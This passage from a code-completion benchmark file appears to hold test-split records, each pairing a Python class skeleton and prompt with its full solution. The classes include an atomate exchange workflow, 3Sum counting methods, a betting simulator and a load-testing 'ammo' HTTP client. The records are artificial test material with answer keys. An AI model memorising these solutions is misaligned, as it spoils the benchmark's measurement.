Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n<|end_body_0|>\n\n<|body_start_1|>\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n<|end_body_1|>\n", "revision_id": "f4060e55ae3a22289fde9516ff0e8e4ac1d22190", "skeleton": "<|skeleton|>\nclass ExchangeWF:\n\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n <|body_0|>\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ExchangeWF:\n def __init__(self, magnetic_structures, energies, default_magmoms=None, db_file=DB_FILE, name='Exchange WF'):\n \"\"\"Workflow for computing exchange parameters. This workflow takes a set of magnetic orderings and their energies from MagneticOrderingsWF and fits to a classical Heisenberg Hamiltonian to compute exchange parameters. The critical temperature can then be calculated with Monte Carlo. Optionally, only the lowest energy FM and AFM configurations can be used to compute the average exchange interaction, , without any static calculations. Args: magnetic_structures (list): Structure objects with the 'magmom' site property. energies (list): Energies per atom in eV. default_magmoms (dict): (optional, defaults provided) dict of magnetic elements to their initial magnetic moments in µB, generally these\"\"\"\n self.uuid = str(uuid4())\n self.wf_meta = {'wf_uuid': self.uuid, 'wf_name': self.__class__.__name__, 'wf_version': __version__}\n ordered_structures = [s for _, s in sorted(zip(energies, magnetic_structures), reverse=False)]\n ordered_energies = sorted(energies, reverse=False)\n self.structures = ordered_structures\n self.energies = ordered_energies\n for s in magnetic_structures:\n try:\n s.site_properties['magmom']\n except Exception:\n raise RuntimeError(\"All structures must have 'magmom' site property.\")\n\n def get_wf(self, num_orderings_hard_limit=16, c=None):\n \"\"\"Retrieve Fireworks workflow. c is an optional dictionary that can contain: * heisenberg_settings: cutoff (float): Starting point for nearest neighbor search. tol (float): Tolerance for equivalent NN bonds. * mc_settings: mc_box_size (float): MC simulation box size in nm. equil_timesteps (int): Number of MC equilibration moves. mc_timesteps (int): Number of MC moves for averaging. avg (bool): Compute only . * DB_FILE: path to db.json. Args: num_orderings_hard_limit (int): will make sure total number of magnetic orderings does not exceed this number even if there are extra orderings of equivalent symmetry c Optional[dict]: additional config dict described above Returns: wf (Workflow): Heise\"\"\"\n c = c or {'DB_FILE': DB_FILE}\n if 'DB_FILE' not in c:\n c['DB_FILE'] = DB_FILE\n heisenberg_settings = c.get('heisenberg_settings', {})\n fws = []\n heisenberg_model_fw = HeisenbergModelFW(wf_uuid=self.uuid, parent_structure=self.structures[0], db_file=c['DB_FILE'], heisenberg_settings=heisenberg_settings, parents=None, structures=self.structures, energies=self.energies)\n mc_settings = c.get('mc_settings', {})\n vampire_fw = VampireCallerFW(wf_uuid=self.uuid, parent_structure=self.structures[0], parents=[heisenberg_model_fw], db_file=c['DB_FILE'], mc_settings=mc_settings)\n fws = [heisenberg_model_fw, vampire_fw]\n wf = Workflow(fws)\n wf = add_additional_fields_to_taskdocs(wf, {'wf_meta': self.wf_meta})\n formula = self.structures[0].composition.reduced_formula\n wf.name = f'{formula} - Exchange'\n return wf\n", "source": "the_stack_v2_python_sparse", "source_path": "atomate/vasp/workflows/base/exchange.py", "source_repo": "hackingmaterials/atomate", "split": "test", "star_events_count": 217} {"blob_id": "d8511d383996cf7221d95f5083db567872bd5bf4", "bodies": ["n = len(arr)\nans = 0\nMOD = 10 ** 9 + 7\nm = {}\nfor i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\nreturn ans % MOD", "n = len(arr)\narr.sort()\nans = 0\nMOD = 10 ** 9 + 7\nfor i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\nreturn ans % MOD", "n = len(arr)\nans = 0\nMOD = 10 ** 9 + 7\ncount = [0] * 101\nfor a in arr:\n count[a] += 1\nfor i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\nreturn ans % MOD"], "bodies_text": "<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000189", "length_bytes": 3256, "license_type": "no_license", "methods": [{"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMulti", "signature": "def threeSumMulti(self, arr, target)"}, {"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMultiTwoPointers", "signature": "def threeSumMultiTwoPointers(self, arr, target)"}, {"docstring": ":type arr: List[int] :type target: int :rtype: int", "name": "threeSumMultiUsingCombination", "signature": "def threeSumMultiUsingCombination(self, arr, target)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000783", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def threeSumMulti(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiTwoPointers(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiUsingCombination(self, arr, target): :type arr: List[int] :type target: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def threeSumMulti(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiTwoPointers(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n- def threeSumMultiUsingCombination(self, arr, target): :type arr: List[int] :type target: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n<|end_body_1|>\n\n<|body_start_2|>\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n<|end_body_2|>\n", "revision_id": "810575368ecffa97677bdb51744d1f716140bbb1", "skeleton": "<|skeleton|>\nclass Solution:\n\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_0|>\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_1|>\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def threeSumMulti(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n m = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n if target - arr[j] - arr[i] in m:\n ans += m[target - arr[j] - arr[i]]\n m[arr[i]] = m.setdefault(arr[i], 0) + 1\n return ans % MOD\n\n def threeSumMultiTwoPointers(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n n = len(arr)\n arr.sort()\n ans = 0\n MOD = 10 ** 9 + 7\n for i in range(n - 2):\n j, k = (i + 1, n - 1)\n while j < k:\n if arr[j] + arr[k] < target - arr[i]:\n j += 1\n elif arr[j] + arr[k] > target - arr[i]:\n k -= 1\n else:\n l, r = (1, 1)\n while j + l < k and arr[j + l] == arr[j]:\n l += 1\n while k - r >= j + l and arr[k - r] == arr[k]:\n r += 1\n ans += (k - j + 1) * (k - j) // 2 if arr[k] == arr[j] else l * r\n j += l\n k -= r\n return ans % MOD\n\n def threeSumMultiUsingCombination(self, arr, target):\n \"\"\":type arr: List[int] :type target: int :rtype: int\"\"\"\n n = len(arr)\n ans = 0\n MOD = 10 ** 9 + 7\n count = [0] * 101\n for a in arr:\n count[a] += 1\n for i in range(target + 1):\n for j in range(i, target + 1):\n k = target - i - j\n if k < 0 or k >= 101 or k < j:\n continue\n if count[i] == 0 or count[j] == 0 or count[k] == 0:\n continue\n if i == j and j == k:\n ans += (count[i] - 2) * (count[i] - 1) * count[i] // 6\n elif i == j and j != k:\n ans += (count[i] - 1) * count[i] // 2 * count[k]\n elif i != j and j == k:\n ans += (count[j] - 1) * count[j] // 2 * count[i]\n elif i != j and j != k:\n ans += count[i] * count[j] * count[k]\n return ans % MOD\n", "source": "the_stack_v2_python_sparse", "source_path": "3/3SumWithMultiplicity.py", "source_repo": "bssrdf/pyleet", "split": "test", "star_events_count": 2} {"blob_id": "9007d7bb2d213ebcca64a38448d8c789a906bd3c", "bodies": ["self.positions = positions\nself.position_vals = []\nself.num_trials = num_trials\ntry:\n self.num_trials = int(num_trials)\nexcept:\n raise TypeError\nelse:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)", "num_shares = 1000 / pos_val\nn = 0\nsum = 0\nwhile n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\nreturn sum", "position = 1000 / pos_val\ndaily_ret = []\nn = 0\nwhile n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\nreturn daily_ret"], "bodies_text": "<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "class_docstring": "this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user", "class_name": "Investment", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000190", "length_bytes": 1888, "license_type": "no_license", "methods": [{"docstring": "Initializes the position list and number of simulations", "name": "__init__", "signature": "def __init__(self, positions, num_trials)"}, {"docstring": "generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1", "name": "generate_outcome", "signature": "def generate_outcome(self, pos_val)"}, {"docstring": "this function inputs a position value, and outputs a list of the return for each simulation (num_trials)", "name": "repeat_investment", "signature": "def repeat_investment(self, pos_val)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005848", "prompt": "Implement the Python class `Investment` described below.\n\nClass description:\nthis class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\n\nMethod signatures and docstrings:\n- def __init__(self, positions, num_trials): Initializes the position list and number of simulations\n- def generate_outcome(self, pos_val): generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\n- def repeat_investment(self, pos_val): this function inputs a position value, and outputs a list of the return for each simulation (num_trials)", "prompted_full_text": "Implement the Python class `Investment` described below.\n\nClass description:\nthis class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\n\nMethod signatures and docstrings:\n- def __init__(self, positions, num_trials): Initializes the position list and number of simulations\n- def generate_outcome(self, pos_val): generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\n- def repeat_investment(self, pos_val): this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\n\n<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n<|end_body_0|>\n\n<|body_start_1|>\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n<|end_body_1|>\n\n<|body_start_2|>\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n<|end_body_2|>\n", "revision_id": "068db95cef0c693ad833fcfe968aa0b5db2162cd", "skeleton": "<|skeleton|>\nclass Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n <|body_0|>\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n <|body_1|>\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Investment:\n \"\"\"this class includes the functions and initialization method for the list of positions and number of simulations that will be input by the user\"\"\"\n\n def __init__(self, positions, num_trials):\n \"\"\"Initializes the position list and number of simulations\"\"\"\n self.positions = positions\n self.position_vals = []\n self.num_trials = num_trials\n try:\n self.num_trials = int(num_trials)\n except:\n raise TypeError\n else:\n if self.num_trials <= 0:\n raise ValueError\n for i in self.positions:\n self.position_vals.append(int(i) / 1000)\n\n def generate_outcome(self, pos_val):\n \"\"\"generates the outcome of betting a total of $1000, given a position value ie. if the position value is 1, it generates the outcome of making 1000 bets of $1\"\"\"\n num_shares = 1000 / pos_val\n n = 0\n sum = 0\n while n < num_shares:\n 'x represents a random number between 0 and 1, which simulates the \\n probability measure that the user wins the bet or loses the bet, based\\n on the value of x'\n x = np.random.random_sample()\n if x >= 0.51:\n sum = sum + pos_val * 2\n n = n + 1\n return sum\n\n def repeat_investment(self, pos_val):\n \"\"\"this function inputs a position value, and outputs a list of the return for each simulation (num_trials)\"\"\"\n position = 1000 / pos_val\n daily_ret = []\n n = 0\n while n < self.num_trials:\n daily_ret.append(self.generate_outcome(pos_val) / 1000.0 - 1)\n n = n + 1\n return daily_ret\n", "source": "the_stack_v2_python_sparse", "source_path": "neb330/Investment.py", "source_repo": "whirlkick/assignment8", "split": "test", "star_events_count": 0} {"blob_id": "a913e82b3e50378e503ca850344acc086be15245", "bodies": ["resp = None\nurl = '{}ammo/{}'.format(self.epoint, ammo_id)\ntry:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\nexcept Exception as e:\n panic(e=e, resp=resp)", "resp = None\ncodes_allowed = [201]\nurl = '{}ammo/'.format(self.epoint)\nkw = {'data': {}}\nif files:\n kw.update({'files': files})\nelif data:\n kw.update({'data': data})\nelse:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\nkw['data'].update({'case': case, 'descr': descr})\ntry:\n resp = requests.post(url, **kw)\nexcept Exception as e:\n panic(e=e, resp=resp)\nif resp.status_code not in codes_allowed:\n panic(resp=resp)\nreturn resp.json()"], "bodies_text": "<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Ammo", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Ammo:\n\n def ammo_get(self, ammo_id):\n \"\"\"Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_0|>\n\n def ammo_post(self, case, descr=None, files=None, data=None):\n \"\"\"Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n resp = None\n url = '{}ammo/{}'.format(self.epoint, ammo_id)\n try:\n resp = requests.get(url, timeout=self.to)\n resp.raise_for_status()\n return resp.json()\n except Exception as e:\n panic(e=e, resp=resp)\n<|end_body_0|>\n\n<|body_start_1|>\n resp = None\n codes_allowed = [201]\n url = '{}ammo/'.format(self.epoint)\n kw = {'data': {}}\n if files:\n kw.update({'files': files})\n elif data:\n kw.update({'data': data})\n else:\n raise ValueError('Malformed kw, define one of: `files` or `data`')\n kw['data'].update({'case': case, 'descr': descr})\n try:\n resp = requests.post(url, **kw)\n except Exception as e:\n panic(e=e, resp=resp)\n if resp.status_code not in codes_allowed:\n panic(resp=resp)\n return resp.json()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000191", "length_bytes": 1984, "license_type": "permissive", "methods": [{"docstring": "Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError", "name": "ammo_get", "signature": "def ammo_get(self, ammo_id)"}, {"docstring": "Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError", "name": "ammo_post", "signature": "def ammo_post(self, case, descr=None, files=None, data=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004687", "prompt": "Implement the Python class `Ammo` described below.\n\nClass description:\nImplement the Ammo class.\n\nMethod signatures and docstrings:\n- def ammo_get(self, ammo_id): Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\n- def ammo_post(self, case, descr=None, files=None, data=None): Upload file to Lunaport service and get new REST resource representation in responce. User requests_toolbelt.MultipartEncoder for big files. Args: data: str, whole file. Returns: dict: New test entrie respresentation. Throws: LunaportClientError", "prompted_full_text": "Implement the Python class `Ammo` described below.\n\nClass description:\nImplement the Ammo class.\n\nMethod signatures and docstrings:\n- def ammo_get(self, ammo_id): Fetch ammo entrie **not ammo file** passing uniq identificator. Args: ammo_id: int Returns: dict: Ammo entrie respresentation. Throws: LunaportClientError\n- def ammo_post(self, case, descr=None, files=None, data=None): Upload file to 